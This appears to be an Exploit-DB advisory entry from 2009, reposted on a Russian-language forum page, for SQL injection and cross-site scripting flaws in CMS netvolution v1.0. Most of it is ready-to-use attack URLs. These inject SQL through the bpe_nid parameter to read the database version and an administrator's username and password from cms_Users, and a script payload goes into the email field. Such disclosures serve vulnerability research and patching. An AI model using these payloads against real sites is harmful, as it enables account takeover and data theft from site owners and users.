- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 7761
- Проверка EDB
-
- Пройдено
- Автор
- ELLINAS
- Тип уязвимости
- WEBAPPS
- Платформа
- ASP
- CVE
- cve-2009-5103 cve-2009-5102
- Дата публикации
- 2009-01-14
Код:
###############################################
Found By : Ellinas aka Greek
Email: [email protected]
Vulnerable Product: CMS netvolution v1.0
website : www.netvolution.net , www.atcom.gr
##############################################
SQL Injection
Version Finding:
http://site/default.asp?pid=8&la=1&bpe_ac=2&bpe_nid=100%20AND%20SUBSTRING(@@version,1,130)=5
Password Finding:
http://site/default.asp?pid=8&la=1&bpe_ac=2&bpe_nid=101%20AND%20
(select%20(substring(userPassword,1,10000))%20FROM%20cms_Users%20where%20userID=4)%20%3E%20608
Username Finding:
http://site/default.asp?pid=8&la=1&bpe_ac=2&bpe_nid=101%20
AND%20(select%20(substring(userName,1,10000))%20FROM%20cms_Users%20where%20userID=4)%20%3E%20608
Cross Site Scripting
Set the variable email to >"><ScRiPt%20%0a%0d>alert(XSS)%3B</ScRiPt>
************************
Many Greetings to:
All Greek Hackers.
*************************
# milw0rm.com [2009-01-14]
- Источник
- www.exploit-db.com